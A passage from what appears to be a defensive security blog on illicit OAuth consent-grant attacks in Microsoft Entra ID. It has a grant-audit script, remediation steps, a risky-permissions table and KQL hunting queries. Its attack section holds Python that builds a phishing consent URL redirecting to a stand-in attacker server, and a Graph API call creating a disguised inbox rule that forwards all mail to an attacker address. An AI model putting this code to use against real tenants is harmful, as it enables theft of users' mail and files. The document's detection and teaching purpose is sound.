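SAMPLE_SERVICE_PRINCIPALS = [
    {'id': 'sp-ms-cli', 'displayName': 'Microsoft Azure CLI',
     'appOwnerOrganizationId': 'f8cdef31-a31e-4b4a-93e4-5f571e91255a',
     'verifiedPublisher': {'displayName': 'Microsoft'}},
    {'id': 'sp-hr-portal', 'displayName': 'HR Portal',
     'appOwnerOrganizationId': TENANT_ID, 'verifiedPublisher': {}},
    {'id': 'sp-archive', 'displayName': 'Compliance Archive Sync',
     'appOwnerOrganizationId': '99999999-9999-9999-9999-999999999999',
     'verifiedPublisher': {}},
]
SAMPLE_GRANTS = [
    {'id': 'g1', 'clientId': 'sp-ms-cli', 'consentType': 'Principal', 'principalId': 'user-a',
     'scope': 'openid profile offline_access User.Read'},
    {'id': 'g2', 'clientId': 'sp-hr-portal', 'consentType': 'AllPrincipals', 'principalId': None,
     'scope': 'openid profile User.ReadBasic.All'},
    {'id': 'g3', 'clientId': 'sp-archive', 'consentType': 'Principal', 'principalId': 'user-b',
     'scope': 'openid profile email offline_access Mail.Read Files.Read.All '
              'User.ReadBasic.All MailboxSettings.ReadWrite'},
]

if __name__ == '__main__':
    for f in audit(SAMPLE_GRANTS, SAMPLE_SERVICE_PRINCIPALS, TENANT_ID):
        print(f.score, f.app, f.grant_id, f.principal_id)
        for r in f.reasons:
            print('   -', r)
```

<p>Against live data, page those two endpoints with a token holding <code>Directory.Read.All</code> and pass the <code>value</code> arrays to <code>audit()</code>. For a confirmed hit, remediation is <code>DELETE /v1.0/oauth2PermissionGrants/{id}</code> followed by <code>POST /v1.0/users/{id}/revokeSignInSessions</code> for the consenting user, and deleting the service principal if nothing legitimate depends on it; resetting the password alone leaves the grant in place.</p>
<p>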
Microsoft's default user-consent setting also lets users consent to applications on their own, without administrator approval, as long as every requested permission is one Microsoft does not classify as requiring admin consent. Every permission in the table below qualifies, unless the tenant has tightened user consent (Entra admin center: Enterprise applications, Consent and permissions).</p>\n<p><strong>Permissions that seem low-risk but enable significant access:</strong></p>\n<table><thead><tr><th>Permission</th><th>What the consent prompt says</th><th>What it enables</th></tr></thead><tbody><tr><td><code>Mail.Read</code></td><td>\"Read your mail\"</td><td>Full inbox access, and it keeps working for as long as the refresh token is renewed</td></tr><tr><td><code>Files.Read.All</code></td><td>\"Read all files that you have access to\"</td><td>Every SharePoint and OneDrive file the user can reach</td></tr><tr><td><code>User.ReadBasic.All</code></td><td>\"Read all users' basic profiles\"</td><td>Enumerate every user's display name, UPN and mail address: the target list for follow-on phishing</td></tr><tr><td><code>offline_access</code></td><td>\"Maintain access to data you have given it access to\"</td><td>A refresh token, so access continues without the user signing in again</td></tr><tr><td><code>MailboxSettings.Read</code></td><td>\"Read your mailbox settings\"</td><td>Read inbox rules, forwarding and auto-reply settings; the ReadWrite variant used in the attack below creates them</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-attack-illicit-consent-grant\">The Attack: Illicit Consent Grant<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-attack-illicit-consent-grant\" class=\"hash-link\" aria-label=\"Direct link to The Attack: Illicit Consent Grant\" title=\"Direct link to The Attack: Illicit Consent Grant\" translate=\"no\">​</a></h3>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Attacker registers an application in any 
Azure tenant (including their own)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Sets redirect URI to their controlled server</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Crafts a consent URL targeting the victim organization</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">attacker_app_client_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"attacker-app-client-id-here\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">redirect_uri </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://attacker-server.com/callback\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">tenant_id </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"target-company.onmicrosoft.com\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># or the 
tenant GUID</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Scopes requesting persistent, broad access</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">scopes </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\" \"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">join</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"openid\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"profile\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"email\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"offline_access\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/Mail.Read\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/Files.Read.All\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/User.ReadBasic.All\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/MailboxSettings.ReadWrite\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># enables forwarding rules</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Consent URL  sent to victim in phishing email</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">consent_url </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"https://login.microsoftonline.com/</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">tenant_id</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">/oauth2/v2.0/authorize\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"?client_id=</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">attacker_app_client_id</span><span class=\"token string-interpolation interpolation 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;response_type=code\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;redirect_uri=</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">redirect_uri</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;scope=</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">scopes</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;response_mode=query\"</span><span 
class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"&amp;state=random-state-value\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># When victim clicks and consents, attacker receives an authorization code</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># They exchange it for access + refresh tokens</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Application grant persists indefinitely in the tenant</span><br></span></code></pre></div></div>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># After consent, attacker sets up email forwarding using Graph API</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># This is the persistence play  even if the user changes their password,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># all email continues forwarding to attacker's mailbox</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">access_token </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"token-obtained-via-consent\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">headers </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string-interpolation string\" 
style=\"color:hsl(139, 66%, 32%)\">f\"Bearer </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">access_token</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Content-Type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"application/json\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Create inbox rule to forward all mail to external address</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">forward_rule </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token 
plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"displayName\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Security Compliance Rule\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># disguised name</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"isEnabled\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"conditions\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"bodyOrSubjectContains\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">[</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># empty = matches all email</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"actions\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"forwardTo\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"emailAddress\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"name\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Compliance Archive\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"address\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"attacker@external-domain.com\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span 
class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"stopProcessingRules\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">False</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">response </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/mailFolders/inbox/messageRules\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><span class=\"token punctuation\" 
style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    json</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">forward_rule</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<p>The inbox rule is invisible to the end user unless they specifically check Outlook rules. Many victims are compromised for months before discovery.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"detection-hunting-for-malicious-consent-grants\">Detection: Hunting for Malicious Consent Grants<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#detection-hunting-for-malicious-consent-grants\" class=\"hash-link\" aria-label=\"Direct link to Detection: Hunting for Malicious Consent Grants\" title=\"Direct link to Detection: Hunting for Malicious Consent Grants\" translate=\"no\">​</a></h3>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Find recently consented third-party applications</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName == 
\"Consent to application\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AppName = tostring(TargetResources[0].displayName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ConsentedBy = tostring(InitiatedBy.user.userPrincipalName),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AppId = tostring(AdditionalDetails[0].value)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(30d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, ConsentedBy, AppName, AppId, Result</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Find applications with high-risk delegated permissions</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName == \"Add delegated permission grant\"</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Permission = tostring(TargetResources[0].modifiedProperties[0].newValue),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Principal = tostring(InitiatedBy.user.userPrincipalName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where Permission has_any (\"Mail.Read\", \"Files.Read.All\", \"MailboxSettings\", \"offline_access\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Principal, Permission</span><br></span></code></pre></div></div>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" 